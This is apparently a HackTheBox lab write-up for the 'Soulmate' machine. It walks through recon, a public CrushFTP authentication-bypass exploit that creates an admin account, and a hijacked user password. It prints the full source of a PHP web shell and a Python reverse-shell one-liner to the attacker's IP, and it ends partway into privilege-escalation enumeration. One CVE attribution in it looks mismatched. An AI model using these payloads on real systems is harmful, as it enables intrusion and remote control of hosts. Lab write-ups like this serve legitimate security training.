HackTheBox - Soulmate Writeup

Machine Information

  • Name: Soulmate
  • IP: 10.10.11.86
  • OS: Linux
  • Difficulty: Easy
  • Points: 20
  • Release Date: 06 Sep 2025
  • Domains: soulmate.htb, ftp.soulmate.htb

Summary

Soulmate is an easy Linux machine that hosts a dating website alongside a vulnerable CrushFTP server. The exploitation path involves leveraging CVE-2025-31161 in CrushFTP version 11.W.657 to bypass authentication and create an administrative user account. This access allows file uploads to the web directory, enabling PHP code execution for initial system access. Privilege escalation is achieved through discovering hardcoded credentials in an Erlang-based SSH service configuration, which provides root-level command execution capabilities.

Reconnaissance and Enumeration

Network Scanning

# Initial port scan
nmap -p- --min-rate 10000 10.10.11.86

# Detailed service enumeration
nmap -sC -sV -p 22,80 -oA nmap/soulmate 10.10.11.86

Nmap Results:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|   256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Soulmate - Find Your Perfect Match
| http-methods:
|   Supported methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)

Host Configuration

Add discovered domains to /etc/hosts:

echo "10.10.11.86 soulmate.htb ftp.soulmate.htb" >> /etc/hosts

Web Application Analysis

Primary Domain: soulmate.htb

Accessing http://soulmate.htb reveals a dating website with the following features:

  • User registration and authentication system
  • Profile creation with personal information and photos
  • Dating profile browsing functionality
  • Member since dates and user interaction features

Registration Process:
The application allows new user registration with fields:

  • Username and Full Name
  • Password and confirmation
  • Bio/description text area
  • Optional profile picture upload (supports JPG, PNG, GIF formats, max 3MB)

Initial Assessment:
Standard web application functionality with no immediately obvious vulnerabilities. The dating site appears to be a decoy or secondary service.

Directory and File Discovery

feroxbuster -u http://soulmate.htb \
    -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \
    -x php,html,js,json,txt,log \
    -t 50 \
    -e

Results:

  • Standard web directories found (/assets/, /css/, /js/)
  • No sensitive files or backup directories discovered
  • Standard HTTP response codes (200, 404)
  • No obvious attack vectors in the main application

Subdomain Enumeration

ffuf -u http://10.10.11.86 \
    -H "Host: FUZZ.soulmate.htb" \
    -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
    -fw 4

Discovery Results:

ftp                     [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 60ms]

Key Finding: ftp.soulmate.htb subdomain discovered

CrushFTP Service Analysis

Service Discovery

Accessing http://ftp.soulmate.htb results in an HTTP 302 redirect to:

http://ftp.soulmate.htb/WebInterface/login.html

This reveals a CrushFTP web interface with:

  • Professional login page design
  • Username/Email and Password fields
  • "Remember me" checkbox functionality
  • "Forgot your password?" recovery option

Version Identification

Examining the HTML source code reveals version information embedded in asset URLs:

<script type="module" crossorigin src="/WebInterface/new-ui/assets/app/components/loader2.js?v=11.W.657-2025_03_08_07_52"></script>
<link rel="stylesheet" crossorigin href="/WebInterface/new-ui/assets/css/app.css?v=11.W.657-2025_03_08_07_52">

Critical Discovery:

  • CrushFTP Version: 11.W.657
  • Build Date: March 8, 2025 (2025_03_08_07_52)
  • Version String Pattern: 11.W.657-2025_03_08_07_52

Vulnerability Research

Research for CrushFTP version 11.W.657 reveals multiple CVEs affecting this version:

  • CVE-2025-31161: Authentication bypass vulnerability
  • CVE-2025-54309: Zero-day exploitation potential
  • CVE-2025-32433: Unauthenticated remote code execution

Selected Exploit: CVE-2025-31161 due to available public exploit and authentication bypass nature.

Exploitation Phase

CVE-2025-31161 Exploitation

CVE-2025-31161 is a critical authentication bypass vulnerability in CrushFTP that allows attackers to create administrative user accounts without proper authentication.

Exploit Acquisition and Setup

# Clone the public exploit repository
git clone https://github.com/Immersive-Labs-Sec/CVE-2025-31161.git
cd CVE-2025-31161

# Review exploit parameters
python3 cve-2025-31161.py --help

Exploit Execution

python3 cve-2025-31161.py \
    --target_host ftp.soulmate.htb \
    --port 80 \
    --target_user root \
    --new_user zero \
    --password 1234

Exploit Output:

[*] Preparing exploit for target: ftp.soulmate.htb
[*] Starting exploit create Request
[*] Exploit Complete you can now login with
[+] Username: zero
[+] Password: 1234

Result: Successfully created administrative user account zero:1234

Administrative Access Verification

Login to CrushFTP with the newly created credentials:

  • URL: http://ftp.soulmate.htb/WebInterface/login.html
  • Username: zero
  • Password: 1234

Successful Login Indicators:

  • Access to administrative dashboard
  • "Admin" menu option visible in navigation
  • User management capabilities available
  • File management and server options accessible

User Account Manipulation

Navigate to User Manager: http://ftp.soulmate.htb/WebInterface/UserManager/index.html

Available Users:

  • ben - Regular user account
  • crushadmin - Administrative account
  • default - Default system account
  • jenna - Regular user account
  • TempAccount - Temporary account

Target Selection: User ben selected for password modification

Password Change Process:

  1. Select user ben from the user list
  2. Navigate to user settings/password section
  3. Change password from current to 123456
  4. Save configuration changes

Verification: User ben password successfully changed to 123456

File Upload Exploitation

Upload Interface Access

Navigate to the file management interface:

http://ftp.soulmate.htb/#/webProd/

Available Directories:

  • /IT/ - Information Technology files
  • /ben/ - User-specific directory
  • /webProd/ - Web production directory (target for upload)

PHP Backdoor Creation

Create simplebackdoor.php with the following content:

<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<?php
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    die;
}
?>

Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

Upload Process

  1. Access upload function in /webProd/ directory
  2. Select simplebackdoor.php file for upload
  3. Upload successful - file size: 328.0 B
  4. Upload timestamp: 05/03/2021 06:44 PM

Critical Discovery: Files uploaded to /webProd/ directory become accessible via the main web server at soulmate.htb, not through the FTP interface.

Web Shell Access

The uploaded PHP file becomes accessible at:

http://soulmate.htb/simplebackdoor.php

Initial Command Test:

http://soulmate.htb/simplebackdoor.php?cmd=id

Output:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Confirmation: PHP code execution successful as www-data user

Initial Foothold

Reverse Shell Establishment

Listener Setup

pwncat-cs --listen --port 4444

Payload Generation

Python reverse shell payload:

python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.xx.1x4",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'

URL-Encoded Execution

http://soulmate.htb/simplebackdoor.php?cmd=python3%20-c%20%27import%20os,pty,socket;s=socket.socket();s.connect((%2210.10.xx.1x4%22,4444));[os.dup2(s.fileno(),f)for%20f%20in(0,1,2)];pty.spawn(%22sh%22)%27

Connection Established:

(remote) www-data@soulmate:/var/www/soulmate.htb/public$ whoami
www-data
(remote) www-data@soulmate:/var/www/soulmate.htb/public$ pwd
/var/www/soulmate.htb/public

System Enumeration

LinPEAS Execution

# Download and execute LinPEAS
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

Key Findings from LinPEAS

Open Ports:

tcp        0      0 127.0.0.1:2222         0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:4369         0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:37171        0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:41319        0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:53336        0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:9090         0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8080         0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80             0.0.0.0:*               LISTEN      1208/nginx: worker
tcp        0      0 0.0.0.0:22             0.0.0.0:*               LISTEN      -

Erlang Components Detected:

  • Multiple Erlang-related processes running
  • FastCGI configuration with Erlang references
  • HTTP configuration files mentioning Erlang libraries
  • Rsync configuration with Erlang paths

Critical Discovery - Port 2222:

nc 127.0.0.1 2222

Response:

SSH-2.0-Erlang/5.2.9
Protocol error)♠♦♦♠♦♠♠♠

This indicates a custom SSH service built with Erlang running on localhost port 2222.

Credential Discovery and User Access

#exploitation #reconnaissance #foothold